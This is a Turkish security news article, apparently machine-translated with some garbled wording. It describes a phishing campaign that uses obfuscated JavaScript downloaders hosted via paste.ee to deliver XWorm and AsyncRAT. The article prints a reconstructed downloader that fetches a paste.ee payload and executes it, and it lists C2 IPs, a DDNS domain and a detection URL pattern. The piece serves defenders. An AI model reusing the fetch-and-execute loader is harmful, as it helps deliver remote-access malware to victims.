Güvenlik araştırmacıları, Xworm ve Asyncrat yüklerini küresel komut ve kontrol (C2) altyapısına dağıtmak için meşru macundan yararlanan gelişmiş bir kötü amaçlı yazılım kampanyası ortaya çıkardılar.
İlk olarak Mayıs 2025’te tanımlanan işlem, macun.EE bağlantılarından ikincil yükleri almak için ağır bir şekilde gizlenmiş JavaScript indiricilerini kullanır ve hizmetin ilk algılama katmanlarını atlamak için güvenilirliğini kullanır.
Hunt.io analistleri, kampanyanın Paste.ee’ye bağlı 9.500’den fazla URL’yi enfekte ettiğini ve Almanya, ABD ve açık deniz barındırma sağlayıcılarını kapsayan altyapı ile enfekte ettiğini doğruladı.
.png
)
.webp)
Saldırı zinciri, teslimat bildirimleri olarak maskelenen kötü niyetli JavaScript dosyalarını dağıtan kimlik avı e -postaları ile başlar.
Bir örnek olan “Dağıtım Bilgileri Belge.js”, MSXML2.xmlhttp Activex nesnesini dinamik olarak yeniden yapılandırırken HTTP istek mantığını gizlemek için Unicode karakter manipülasyonu kullanır.
.webp)
Bu teknik, komut dosyasının macundan şifreli yükleri getirmesine izin verir. http://paste.ee/d/s1uVin8i/0hangi xworm veya asyncrat ikili ev sahipleri.
Hunt.io’nun otomatik tehdit istihbarat platformu, kritik bağlantı noktalarında anormal SSL sertifika modelleri tespit etti ve etkinliği Almanya tabanlı barındırma sağlayıcısı veriforest GMBH altında çalışan bilinen Asyncrat C2 sunucularına bağladı.
Enfeksiyon mekanizması ve yük yürütme analizi
Kötü amaçlı yazılım enfeksiyon dizisi, statik analizden kaçmak için çok aşamalı şaşkınlığa dayanır. İlk JavaScript yükleri, temel dize eşleştirme dedektörlerini karıştırmak için tasarlanmış önemsiz karakterler ve kırık sözdizimi içerir.
Aşağıda, indiricinin temel işlevselliğinin yeniden yapılandırılmış bir sürümü:-
```javascript
// Dynamically build HTTP object to bypass keyword scanners
var httpObj = new ActiveXObject("M" + "SXML2.XML" + "HTTP");
var payloadURL = "hxxp://paste[.]ee/d/s1uVin8i/0".replace(/xx/g,"tt");
httpObj.Open("GET", payloadURL, false);
httpObj.Send();
var maliciousCode = httpObj.ResponseText;
// Execute retrieved payload via Function constructor
(new Function(maliciousCode))();
```Bu komut dosyası, yürütme sonrası ek şifre çözme rutinleri geçiren şifreli ikili dosyaları alır.
Kampanyada keşfedilen Xworm varyantları, C2 IPS ve iletişim parametreleri içeren AES ile şifreli yapılandırma blokları kullanın:-
csharp Settings.Hosts = Conversions.ToString(AlgorithmAES.Decrypt(Settings.Hosts)); Settings.Port = Conversions.ToString(AlgorithmAES.Decrypt(Settings.Port)); Settings.KEY = Conversions.ToString(AlgorithmAES.Decrypt(Settings.KEY));
Şifreli yapılandırmalar IP ile bağlantıları ortaya çıkarır 45.145.43.244 (Almanya) 6606/7707 limanlarında, ilk olarak Şubat 2025’te gözlemlenen asyncrat SSL sertifikalarına ev sahipliği yapıyor.
Xworm’un Keylogging modülü, iyi huylu arka plan işlemleri olarak maskelenirken sistem çapında girişi yakalar, AES ile şifreli HTTP Post istekleri aracılığıyla verileri periyodik olarak söndürür.
Hunt.io’nun altyapı analizi, Quadranet Enterprises LLC (US) ve SC ITNS.NET SRL (Romanya) dahil olmak üzere çoklu ASN’lerde koordineli C2 operasyonlarını ortaya çıkardı.
Tehdit aktörleri, 30120 numaralı bağlantı noktasında sahtekâr fivem oyun sunucusu sertifikaları ve 3389 numaralı bağlantı noktasında RDP hizmetleri ile kalıcılığı korudu. WIN-RI8CECQIG28.
Güvenlik ekiplerinin anormal macun izlemeleri tavsiye edilir .ee URL desenleri (https://paste.ee/d/[a-zA-Z0-9]{5}/0) ve JavaScript dosyalarını Unicode tabanlı gizleme için inceleyin.
Alman IP’ye ağ trafiği 45.145.43.244 veya ilişkili alanı abuwire123[.]ddns[.]net Anında muhafaza protokollerini tetiklemelidir.
Tehdit istihbarat aramasıyla tehdit araştırmalarını hızlandırın ve zenginleştirin! -> 50 Deneme Arama İsteği